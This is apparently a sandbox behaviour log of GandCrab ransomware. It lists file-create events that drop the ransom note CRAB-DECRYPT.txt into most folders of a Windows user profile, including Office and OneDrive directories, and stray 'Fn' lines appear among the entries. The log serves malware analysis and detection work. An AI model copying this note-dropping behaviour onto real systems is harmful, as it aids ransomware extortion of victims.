Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Tiles\pin-18110748030\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Tiles\pin-19904609010\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Tiles\pin-314712940\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Tiles\pin-4085800870\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Tiles\pin-706976130\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Tiles\pin-7404745920\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Tiles\pin-8427938880\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Tiles\pin-9449249960\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Tiles\pin15686110540\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Tiles\pin17161738060\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Tiles\pin19620886520\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Tiles\pin20075419400\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Tiles\pin20075423150\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Tiles\pin21042551290\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Tiles\pin2327546390\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Tiles\pin3769534880\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Tiles\pin4101377530\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\Tracking Protection\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\VersionManager\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Media Player\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Media Player\Sync Playlists\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Media Player\Sync Playlists\en-US\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Media Player\Transcoded Files Cache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\BackstageInAppNavCache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\WebServiceCache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\WebServiceCache\AllUsers\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\Wef\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\Wef\AppCommands\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\OTele\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\OTele\{94EAEC45-055E-40D3-AC7E-1317913A835B} (1) - 3100 - mspub.exe - OTele.dat desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\OTele\{94EAEC45-055E-40D3-AC7E-1317913A835B} (1) - 3100 - mspub.exe - OTeleMediumCost.dat desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\OTele\{94EAEC45-055E-40D3-AC7E-1317913A835B} (2) - 3100 - mspub.exe - OTele.dat desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\OTele\{9563EC4C-BF03-4AA4-ABB5-7395066C012E} (0) - 1432 - winword.exe - OTele.dat desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\OTele\{9563EC4C-BF03-4AA4-ABB5-7395066C012E} (0) - 1432 - winword.exe - OTeleMediumCost.dat desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\OTele\{9563EC4C-BF03-4AA4-ABB5-7395066C012E} (1) - 1432 - winword.exe - OTele.dat desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\OTele\{9563EC4C-BF03-4AA4-ABB5-7395066C012E} (1) - 1432 - winword.exe - OTeleMediumCost.dat desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\OTele\{9563EC4C-BF03-4AA4-ABB5-7395066C012E} (2) - 1432 - winword.exe - OTele.dat desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\OTele\{99EF5110-2E92-4433-B206-F9A1D9F0BE82} (0) - 3932 - powerpnt.exe - OTele.dat desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\OTele\{99EF5110-2E92-4433-B206-F9A1D9F0BE82} (0) - 3932 - powerpnt.exe - OTeleMediumCost.dat desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\OTele\{99EF5110-2E92-4433-B206-F9A1D9F0BE82} (1) - 3932 - powerpnt.exe - OTele.dat desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\OTele\{99EF5110-2E92-4433-B206-F9A1D9F0BE82} (1) - 3932 - powerpnt.exe - OTeleMediumCost.dat desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\OTele\{99EF5110-2E92-4433-B206-F9A1D9F0BE82} (2) - 3932 - powerpnt.exe - OTele.dat desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.6743.1212\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\adm\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\af\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\am-et\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\amd64\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\ar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\arm64\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\as-in\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\az-latn-az\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\be\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\bg\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\bn-bd\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\bn-in\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\bs-latn-ba\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\ca\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\ca-es-valencia\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\cs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\cy-gb\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\da\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\de\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\el\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\en\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\en-gb\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\es\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\et\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\eu\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\fa\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\fi\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\fil-ph\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\fr\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\ga-ie\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\gd-latn\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\gl\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\gu\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\ha-latn-ng\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\he\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\hi\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\hr\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\hu\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.7294.0108\hy\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
